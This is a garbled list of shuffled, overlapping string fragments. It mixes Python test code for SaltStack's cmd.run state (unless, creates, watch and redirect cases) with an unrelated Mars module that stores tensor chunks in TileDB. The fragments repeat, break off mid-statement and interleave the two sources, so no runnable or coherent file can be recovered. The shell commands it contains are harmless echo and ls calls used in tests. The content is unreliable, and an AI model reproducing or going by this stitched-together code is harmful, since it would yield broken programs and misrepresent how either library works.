"os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test cmd.run watch '''", "= self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create", "os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file,", "ensures that we made it to the last unless #", "the list will pass, but the second will fail. This", "cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as", "exc # Create the testfile and release the handle fd,", "the # command \"echo \"hello\"\" was run. This ensures that", "PR #35545.) ''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We", "run bailed out after the first unless command succeeded, #", "test cmd.run using multiple unless options where the first cmd", "of run_redirect ''' def setUp(self): self.state_name = 'run_redirect' state_filename =", "{0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent('''", "absolute_import import errno import os import textwrap import tempfile #", "''' Validate the cmd state ''' def test_run_simple(self): ''' cmd.run", "will fail. This tests the fix for issue #35384. (The", "# then the unless state run bailed out after the", "True biscuits: cmd.wait: - name: echo biscuits - cwd: /", "\"unless execution succeeded\", or similar, # then the unless state", "#35545.) ''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must", "is in PR #35545.) ''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls)", "the handle fd, self.test_file = tempfile.mkstemp() try: os.close(fd) except OSError", "Import Salt Testing libs from tests.support.case import ModuleCase from tests.support.paths", "libs import salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): '''", "of the tests leave files around that we want to", "state run bailed out after the first unless command succeeded,", "salt libs import salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin):", "-*- coding: utf-8 -*- ''' Tests for the file state", "the testfile and release the handle fd, self.test_tmp_path = tempfile.mkstemp()", "release the handle fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except", "tests the fix for issue #35384. (The fix is in", "CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of run_watch '''", "tearDown(self): for path in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except", "import textwrap import tempfile # Import Salt Testing libs from", "'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: -", "if exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self):", "echo cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name])", "exc.errno != errno.EBADF: raise exc # Create the testfile and", "test_run_creates_exists(self): ''' test cmd.run creates already there ''' state_key =", "''' test cmd.run using multiple unless options where the first", "SaltReturnAssertsMixin): ''' Validate the cmd state of run_redirect ''' def", "sure the comment reads that the # command \"echo \"hello\"\"", "in the state. If the comment reads \"unless execution succeeded\",", "made it to the last unless # command in the", "\"echo \"hello\"\" was run. This ensures that we made it", "the unless state run bailed out after the first unless", "the handle fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except OSError", "def setUp(self): self.state_name = 'run_redirect' state_filename = self.state_name + '.sls'", "4) def test_run_redirect(self): ''' test cmd.run with shell redirect '''", "else 'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self):", "already there ''' state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file)", "reads \"unless execution succeeded\", or similar, # then the unless", "state of run_watch ''' def setUp(self): self.state_name = 'run_watch' state_filename", "tree. pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test cmd.run unless", "unless: echo cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls',", "cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test interface ''' ret", "SaltReturnAssertsMixin # Import salt libs import salt.utils IS_WINDOWS = salt.utils.is_windows()", "of the tests create the sls files in the test", "import ModuleCase from tests.support.paths import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin", "bailed out after the first unless command succeeded, # which", "'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo cheese", "changed=true - cwd: / - stateful: True biscuits: cmd.wait: -", "def test_run_creates_exists(self): ''' test cmd.run creates already there ''' state_key", "'run_watch' state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename)", "biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: -", "super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test cmd.run unless ''' state_key", "{0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase,", "cmd.wait: - name: echo biscuits - cwd: / - watch:", "command in the state. If the comment reads \"unless execution", "pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test cmd.run unless '''", "'.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file)", "must assert against the comment here to make sure the", "(The fix is in PR #35545.) ''' sls = self.run_function('state.sls',", "with shell redirect ''' state_key = 'cmd_|-echo test > {0}_|-echo", "{0}: cmd.run: - creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name])", "first cmd in the list will pass, but the second", "{0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo", "ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate", "redirect ''' state_key = 'cmd_|-echo test > {0}_|-echo test >", "def test_run_creates_new(self): ''' test cmd.run creates not there ''' os.remove(self.test_file)", "that we want to remove # As some of the", "self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate", "state_filename) # Create the testfile and release the handle fd,", "test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo", "This tests the fix for issue #35384. (The fix is", "= self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test", "to make sure the comment reads that the # command", "fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo cheese > {1} '''.format(self.test_tmp_path,", "files around that we want to remove # As some", "some are using files in the integration test file state", "''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert", "def test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple unless options where", "test cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key =", "= 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines:", "= 'run_redirect' state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE,", "import errno import os import textwrap import tempfile # Import", "fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: - creates: {0} '''.format(self.test_file)))", "= 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w')", "unless command succeeded, # which is the bug we're regression", "creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4)", "biscuits: cmd.wait: - name: echo biscuits - cwd: / -", "'''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): '''", "''' test cmd.run creates already there ''' state_key = 'cmd_|-echo", "except OSError: # Not all of the tests leave files", "cmd.run: - creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result'])", "self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest,", "# -*- coding: utf-8 -*- ''' Tests for the file", "- watch: - cmd: saltines ''')) ret = self.run_function('state.sls', [self.state_name])", "around that we want to remove # As some of", "for issue #35384. (The fix is in PR #35545.) '''", "for the file state ''' # Import python libs from", "cmd.run with shell redirect ''' state_key = 'cmd_|-echo test >", "ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run", "textwrap import tempfile # Import Salt Testing libs from tests.support.case", "in PR #35545.) ''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) #", "cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin):", "and release the handle fd, self.test_file = tempfile.mkstemp() try: os.close(fd)", "errno.EBADF: raise exc # Create the testfile and release the", "biscuits - cwd: / - watch: - cmd: saltines '''))", "which is the bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'],", "changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_:", "we made it to the last unless # command in", "fail. This tests the fix for issue #35384. (The fix", "self.test_file): try: os.remove(path) except OSError: # Not all of the", "# Not all of the tests leave files around that", "- cmd: saltines ''')) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[saltines_key]['result']) self.assertTrue(ret[biscuits_key]['result'])", "except OSError as exc: if exc.errno != errno.EBADF: raise exc", "# And some are using files in the integration test", "handle fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except OSError as", "self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of", "= os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown()", "self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple unless options", "utf-8 -*- ''' Tests for the file state ''' #", "self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test cmd.run", "OSError: # Not all of the tests leave files around", "errno import os import textwrap import tempfile # Import Salt", "libs from __future__ import absolute_import import errno import os import", "salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: -", "import os import textwrap import tempfile # Import Salt Testing", "the file state ''' # Import python libs from __future__", "+ '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile", "using multiple unless options where the first cmd in the", "= 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run:", "tests.support.case import ModuleCase from tests.support.paths import TMP_STATE_TREE from tests.support.mixins import", "leave files around that we want to remove # As", "from __future__ import absolute_import import errno import os import textwrap", "= self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp()", "sls files in the test itself, # And some are", "Not all of the tests leave files around that we", "{0}: cmd.run: - unless: echo cheese > {1} '''.format(self.test_tmp_path, self.test_file)))", "- name: echo biscuits - cwd: / - watch: -", "remove # As some of the tests create the sls", "with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run:", "cmd = 'dir' if IS_WINDOWS else 'ls' ret = self.run_state('cmd.run',", "Salt Testing libs from tests.support.case import ModuleCase from tests.support.paths import", "second will fail. This tests the fix for issue #35384.", "cmd state of run_redirect ''' def setUp(self): self.state_name = 'run_redirect'", "from tests.support.mixins import SaltReturnAssertsMixin # Import salt libs import salt.utils", "tests create the sls files in the test itself, #", "there ''' os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file)", "as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo cheese >", "echo biscuits - cwd: / - watch: - cmd: saltines", "itself, # And some are using files in the integration", "test cmd.run creates already there ''' state_key = 'cmd_|-echo >>", "fix for issue #35384. (The fix is in PR #35545.)", "''' test cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key", "- cwd: / - watch: - cmd: saltines ''')) ret", "= salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state", "state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) #", "def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test cmd.run", "mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert against the comment here", "def test_run_redirect(self): ''' test cmd.run with shell redirect ''' state_key", "{0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def", "cmd.run ''' cmd = 'dir' if IS_WINDOWS else 'ls' ret", "unless # command in the state. If the comment reads", "- stateful: True biscuits: cmd.wait: - name: echo biscuits -", "or similar, # then the unless state run bailed out", "name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the", "''' # Import python libs from __future__ import absolute_import import" ]
[ "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "* chunk.ndim, dtype=chunk.dtype) else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if", "datastore from .utils import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx =", "tiledb = None from ...lib.sparse import SparseNDArray from ...lib.sparse.core import", "# # Licensed under the Apache License, Version 2.0 (the", "compliance with the License. # You may obtain a copy", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "2.0 (the \"License\"); # you may not use this file", "agreed to in writing, software # distributed under the License", "file except in compliance with the License. # You may", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "Unless required by applicable law or agreed to in writing,", "except ImportError: # pragma: no cover tiledb = None from", "to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as", "if to_store.shape[0] == 1 else to_store.row vec += axis_offsets[0] arr[vec]", "if chunk.ndim == 1: vec = to_store.col if to_store.shape[0] ==", "1999-2018 Alibaba Group Holding Ltd. # # Licensed under the", "distributed under the License is distributed on an \"AS IS\"", "chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not chunk.issparse(): # dense to_store", "slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp)", "-*- # Copyright 1999-2018 Alibaba Group Holding Ltd. # #", "permissions and # limitations under the License. import numpy as", "SparseNDArray from ...lib.sparse.core import sps from ..expressions import datastore from", "1 else to_store.row vec += axis_offsets[0] arr[vec] = to_store.data else:", "the specific language governing permissions and # limitations under the", "#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 1999-2018", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not chunk.issparse(): #", "ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor", "chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for", "express or implied. # See the License for the specific", "applicable law or agreed to in writing, software # distributed", "except in compliance with the License. # You may obtain", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "limitations under the License. import numpy as np try: import", "import datastore from .utils import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx", "axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length))", "tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store", "chunk.ndim, dtype=chunk.dtype) else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", "tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp", "arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else:", "> 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr:", "arr[i, j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape)", "not use this file except in compliance with the License.", "axis in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset,", "try: import tiledb except ImportError: # pragma: no cover tiledb", "np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo()", ".utils import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri", "+ axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0),", "= get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp =", "writing, software # distributed under the License is distributed on", "in writing, software # distributed under the License is distributed", "Ltd. # # Licensed under the Apache License, Version 2.0", "you may not use this file except in compliance with", "_store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key =", "# Licensed under the Apache License, Version 2.0 (the \"License\");", "language governing permissions and # limitations under the License. import", "not chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = []", "as arr: if chunk.ndim == 1: vec = to_store.col if", "range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset +", "to_store.shape[0] == 1 else to_store.row vec += axis_offsets[0] arr[vec] =", "ImportError: # pragma: no cover tiledb = None from ...lib.sparse", "chunk.op.axis_offsets if not chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs", "with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] =", "1: vec = to_store.col if to_store.shape[0] == 1 else to_store.row", "axis_offsets[0] arr[vec] = to_store.data else: i, j = to_store.row +", "= SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor import", "# pragma: no cover tiledb = None from ...lib.sparse import", "use this file except in compliance with the License. #", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "= chunk.op.axis_offsets if not chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key])", "axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as", "arr[vec] = to_store.data else: i, j = to_store.row + axis_offsets[0],", "= np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: # sparse to_store =", "to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis in range(chunk.ndim):", "else to_store.row vec += axis_offsets[0] arr[vec] = to_store.data else: i,", "arr: if chunk.ndim == 1: vec = to_store.col if to_store.shape[0]", "dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor import register register(datastore.TensorTileDBDataStore, _store_tiledb)", "coding: utf-8 -*- # Copyright 1999-2018 Alibaba Group Holding Ltd.", "-*- coding: utf-8 -*- # Copyright 1999-2018 Alibaba Group Holding", "CONDITIONS OF ANY KIND, either express or implied. # See", "chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets", "sps from ..expressions import datastore from .utils import get_tiledb_ctx def", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "or implied. # See the License for the specific language", "License is distributed on an \"AS IS\" BASIS, # WITHOUT", "np try: import tiledb except ImportError: # pragma: no cover", "License. # You may obtain a copy of the License", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "License, Version 2.0 (the \"License\"); # you may not use", "SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor import register", "# You may obtain a copy of the License at", "cover tiledb = None from ...lib.sparse import SparseNDArray from ...lib.sparse.core", "KIND, either express or implied. # See the License for", "specific language governing permissions and # limitations under the License.", "i, j = to_store.row + axis_offsets[0], to_store.col + axis_offsets[1] arr[i,", "= to_store.row + axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j] =", "under the License is distributed on an \"AS IS\" BASIS,", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "chunk.ndim == 1: vec = to_store.col if to_store.shape[0] == 1", "chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key", "License for the specific language governing permissions and # limitations", "the License. import numpy as np try: import tiledb except", "= to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler():", "uri, mode='w', key=key, timestamp=timestamp) as arr: if chunk.ndim == 1:", "with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: if chunk.ndim", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key] =", "utf-8 -*- # Copyright 1999-2018 Alibaba Group Holding Ltd. #", "numpy as np try: import tiledb except ImportError: # pragma:", "None from ...lib.sparse import SparseNDArray from ...lib.sparse.core import sps from", "axis_offsets = chunk.op.axis_offsets if not chunk.issparse(): # dense to_store =", "axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)]", "dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis in", "License. import numpy as np try: import tiledb except ImportError:", "from ...lib.sparse.core import sps from ..expressions import datastore from .utils", "key=key, timestamp=timestamp) as arr: if chunk.ndim == 1: vec =", "to_store.col if to_store.shape[0] == 1 else to_store.row vec += axis_offsets[0]", "axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype),", "the License for the specific language governing permissions and #", "pragma: no cover tiledb = None from ...lib.sparse import SparseNDArray", "to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri,", "vec = to_store.col if to_store.shape[0] == 1 else to_store.row vec", "+= axis_offsets[0] arr[vec] = to_store.data else: i, j = to_store.row", "(the \"License\"); # you may not use this file except", "import numpy as np try: import tiledb except ImportError: #", "Apache License, Version 2.0 (the \"License\"); # you may not", "uri, mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store ctx[chunk.key]", "# you may not use this file except in compliance", "under the License. import numpy as np try: import tiledb", "...lib.sparse.core import sps from ..expressions import datastore from .utils import", "either express or implied. # See the License for the", "get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp", "= np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis in range(chunk.ndim): axis_offset", "= chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets =", "# sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with", "= ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w',", "= to_store.data else: i, j = to_store.row + axis_offsets[0], to_store.col", "OR CONDITIONS OF ANY KIND, either express or implied. #", "chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not chunk.issparse():", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: if chunk.ndim ==", "...lib.sparse import SparseNDArray from ...lib.sparse.core import sps from ..expressions import", "the License is distributed on an \"AS IS\" BASIS, #", "in compliance with the License. # You may obtain a", "np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis in range(chunk.ndim): axis_offset =", "dtype=chunk.dtype) else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz >", "# -*- coding: utf-8 -*- # Copyright 1999-2018 Alibaba Group", "software # distributed under the License is distributed on an", "Holding Ltd. # # Licensed under the Apache License, Version", "governing permissions and # limitations under the License. import numpy", "# # Unless required by applicable law or agreed to", "vec += axis_offsets[0] arr[vec] = to_store.data else: i, j =", "= axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with", "from ...lib.sparse import SparseNDArray from ...lib.sparse.core import sps from ..expressions", "== 1 else to_store.row vec += axis_offsets[0] arr[vec] = to_store.data", "ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key,", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "to_store.col + axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0,", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "tiledb except ImportError: # pragma: no cover tiledb = None", "ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: # sparse to_store", "mode='w', key=key, timestamp=timestamp) as arr: if chunk.ndim == 1: vec", "Alibaba Group Holding Ltd. # # Licensed under the Apache", "j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def", "Version 2.0 (the \"License\"); # you may not use this", "timestamp=timestamp) as arr: if chunk.ndim == 1: vec = to_store.col", "to_store.row + axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j] = to_store.data", "as np try: import tiledb except ImportError: # pragma: no", "law or agreed to in writing, software # distributed under", "..expressions import datastore from .utils import get_tiledb_ctx def _store_tiledb(ctx, chunk):", "Copyright 1999-2018 Alibaba Group Holding Ltd. # # Licensed under", "= chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not chunk.issparse(): # dense", "if not chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs =", "else: i, j = to_store.row + axis_offsets[0], to_store.col + axis_offsets[1]", "python # -*- coding: utf-8 -*- # Copyright 1999-2018 Alibaba", "= to_store.col if to_store.shape[0] == 1 else to_store.row vec +=", "for axis in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis]", "else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0:", "= to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: #", "get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri", "axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx,", "chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key,", "implied. # See the License for the specific language governing", "under the Apache License, Version 2.0 (the \"License\"); # you", "timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,) *", "\"License\"); # you may not use this file except in", "+ axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key]", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri,", "j = to_store.row + axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j]", "to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: # sparse", "to_store.row vec += axis_offsets[0] arr[vec] = to_store.data else: i, j", "to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), 